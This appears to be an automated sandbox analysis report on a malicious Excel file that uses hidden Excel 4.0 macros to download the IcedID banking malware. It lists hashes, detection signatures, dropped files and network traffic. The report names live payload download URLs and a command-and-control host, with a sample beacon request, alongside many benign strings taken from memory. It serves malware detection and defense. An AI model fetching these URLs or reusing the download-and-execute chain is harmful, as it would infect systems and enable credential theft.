Analysis Report document-1915351743.xls

Overview

General Information

Sample Name: document-1915351743.xls
Analysis ID: 356250
MD5: 976d437fbf1c1598413411d366092cb6
SHA1: ab1c382ec0a25bd9881eee9a3401c9e1b78ee4e5
SHA256: 21944a6a3c05598d1cdc6893c982e22d81344ff8bc8225811691512976aa6bcc
Tags: SilentBuilderxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0 IcedID
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected IcedID
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Yara detected hidden Macro 4.0 in Excel
Adds / modifies Windows certificates
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

AV Detection:

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1802[1].gif ReversingLabs: Detection: 41%
Source: C:\Users\user\idefje.ekfd ReversingLabs: Detection: 41%
Yara detected IcedID
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2324, type: MEMORY
Source: Yara match File source: 3.2.rundll32.exe.7feea7c0000.10.unpack, type: UNPACKEDPE

Compliance:

barindex
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 143.204.4.74:443 -> 192.168.2.22:49167 version: TLS 1.0
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 197.242.147.47:443 -> 192.168.2.22:49165 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 1802[1].gif.0.dr Jump to dropped file
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe Jump to behavior
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: miraclecollagen.co.za
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 197.242.147.47:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 197.242.147.47:443

Networking:

barindex
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=620514333:1:5267:49; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=373833383735:416C627573; __io=0; _gid=67AFEDC5AC03Host: oskolko.uno
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 143.204.4.74:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ Jump to behavior
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=620514333:1:5267:49; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=373833383735:416C627573; __io=0; _gid=67AFEDC5AC03Host: oskolko.uno
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
Source: rundll32.exe, 00000003.00000002.2128541191.0000000001C80000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: miraclecollagen.co.za
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 22 Feb 2021 19:13:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 30 39 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 6f 73 6b 6f 6c 6b 6f 2e 75 6e 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 109<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at oskolko.uno Port 80</address></body></html>0
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
Source: idefje.ekfd.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
Source: idefje.ekfd.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000003.00000002.2128541191.0000000001C80000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2128541191.0000000001C80000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2128779790.0000000001E67000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2128779790.0000000001E67000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://o.ss2.us/0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.rootg2.amazontrust.com08
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.sca1b.amazontrust.com06
Source: idefje.ekfd.0.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://oskolko.uno/om/
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://s.ss2.us/r.crl0
Source: rundll32.exe, 00000003.00000002.2129883264.0000000002DA0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2128779790.0000000001E67000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2128779790.0000000001E67000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2129883264.0000000002DA0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rundll32.exe, 00000003.00000002.2128541191.0000000001C80000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2128779790.0000000001E67000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2128541191.0000000001C80000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2128541191.0000000001C80000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: http://x.ss2.us/x.cer0&
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/aws-blog/1.0.34/js
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/da/js/1.0.47/aws-da.js
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/g11n-lib/2.0.63
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.373
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.373/style-awsm.css
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/images
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logo
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-search/1.0.13/js
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra/1.0.373/directories
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra/1.0.373/libra-cardsui
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra/1.0.373/libra-head.js
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra/1.0.373/librastandardlib
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/plc/js/1.0.107/plc
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/pricing-calculator/js/1.0.2
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/psf/null
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/target/1.0.112/aws-target-mediator.js
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: https://amazon.com/Y
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://amazonwebservicesinc.tt.omtrdc.net
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2128397366.0000000000379000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/?nc2=h_lg
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/ar/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/ar/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/cn/
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/cn/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/de/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/de/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/es/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/es/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/fr/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/fr/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/id/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/it/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/jp/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/ko/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/marketplace?aws=hp
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/pt/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/ru/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/search
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/search/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/search/?searchQuery=
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/th/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/tr/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/tw/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/vi/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/console/home
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobile
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://d1.awsstatic.com
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gif
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://devices.amazonaws.com?hp=tile&amp;so-exp=below
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
Source: document-1915351743.xls String found in binary or memory: https://miraclecollagen.co.za/ds/1802.Dc
Source: document-1915351743.xls String found in binary or memory: https://miraclecollagen.co.za/ds/1802.gif
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://pages.awscloud.com/AmazonECSAnywherePreview.html?hp=tile&amp;so-exp=below
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=fico
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllw
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&amp;sc_icampaign=
